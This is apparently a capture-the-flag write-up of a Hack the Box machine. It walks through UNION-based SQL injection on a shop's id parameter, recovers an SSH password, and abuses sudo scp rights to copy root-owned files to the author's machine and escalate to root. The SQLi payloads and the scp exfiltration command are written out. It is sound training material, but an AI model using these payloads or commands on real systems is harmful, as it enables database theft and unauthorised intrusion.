We will start with a version scan with script of the top ports on the site:
We have a ssh port open on port 22 and an Apache web service open on port 80.
Port 80 Apache web server
Lets navigate to the online shop:
Here we can purchase a package, I will select the bronze package:
The first thing to notice here is the address block which gives this page an ?id=2.
From the tags relating to this box we know it involved SQLi or SQL injection. I am going to cycle through and change the ?id= from 0 to 5 and see what other pages it brings up.
?id=0 — No results found
?id=1 — Gold package
?id=2 — Bronze package
?id=3 — Basic package
?id=4 — No results found
?id=5 — Development package (Interesting)
We have a user named Dennis. There is also a note saying that we cannot use certain characters, obviously the ‘ character is used in SQLi.
Let’s try and break the SQL using ?id=5‘ or 1=1
So we are being blocked from using the ‘ character. This is why my initial trials using SQLMap did not work. So let try another special character that is not blocked ‘*’.
As you can see, appending ?id=5* causes an error in the SQL, so it is fair to say that that the developer has been lazy with their code and this is vulnerable to a SQLi attack.
Lets first try to find out how many columns are in the database and see if we can perform a union exploit.
To do this we use the ‘order by’ statement and increase the number of columns until we get an error. So ?id=5 order by 1,2,3…..
So our database has 5 columns, knowing this information we can use the union command to exploit the database and retrieve information, but first we need to see whether any of the columns are vulnerable, that is where the union command comes in, ?id=5 union all select 1,2,3….
By adding 01,02,03,04 and 05 to the column numbers I can see those which are vulnerable. As some of the columns such as price prefix with a $ sign, we can use column 2,4 and 5 to pull information from the database. Column 1 does not appear on the website, so we cannot use that one either.
We need to find the database version, database name and we already know the number of columns.
the database name is park and the version is ubuntu 16.04.
To pull the tables from the database we can use the following:
?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()
We can see that we have two tables items and users.
Lets see if we can pull the columns relating the the table ‘users’. To do this we can use the following:
?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = “users”
In the table ‘users’ we have the following columns - id, username and password.
Normally I would extend this further and pull all the usernames and passwords from the database; however, remember the webpage when ?id=5.
The ‘username’ has been blocked; however, we can at least retrieve the password. We can extract the password using:
?id=5 union select 1,2,3,password,5 from users
Although we cannot retrieve to username, we can assume that the username is Dennis and a password: ih8dinos. Hopefully these are the ssh credentials for port 22.
SSH server port 22
We are in, exploring the home directory for Dennis we find flag1.txt
We can also read the .bash_history.
In the .bash_history we can see the third flag. Also there is a lot of data regarding scp which is being run as sudo. Scp is a file transfer system for transferring file between computers using ssh. We can also see that flag5 is in the /root directory.
Lets check out if Dennis has any Sudo privileges:
We can see that Dennis has full root privilege to run scp, which now explains the .bash_history.
Moving back to /home to see what other users we have. There is one called ubuntu which we cd into.
There is an interesting file that stands out, which belongs to root called .viminfo which is also hidden. Although this is owned by root, we have full sudo privileges to copy this file to our local machine using scp.
You should have the ssh server already installed on Kali; however, you can check this with the following:
apt list openssh-servAs I do not use ssh that much, I use ssh.socket, start the ssh server with the following:
# systemctl start ssh.socketIf you want a great guid for setting up the ssh server, check out the link below
Anyway back to downloading the interesting .viminfo file to our local machine using scp.
sudo scp .viminfo user@IP-ADDRESS:/FILE-LOCATION
Back on our local machine we can cat the .viminfo file, which gives us some very interesting information.
As you can see, we have the location of flagTwo, which can be found in /boot/grub/fonts.
We can cat this file and retrieve the second flag:
We know there is no flag4 and we know that flag5 is in the /root directory.
Again we can use the sudo rights for scp to transfer flag5 to our local machine.
Alternative method:
There is another option that can be employed instead of transferring the files to the local machine using scp. Basically the binary scp is vulnerable and as it is owned by root, we can exploit this to escalate our privileges to root.
The go to resource for exploitable common binaries is GTFOBins:
A quick search on GTFOBins for scp with sudo rights gives us the following exploit:
Lets enter this code as user Dennis and see what happens:
How awesome is that, a few lines of code and full root access.
I really enjoyed this box, especially the SQLi with the added challenge with the blacklisted characters and also learnt a few new things along the way.
Thank you to Hack the Box for developing this box.
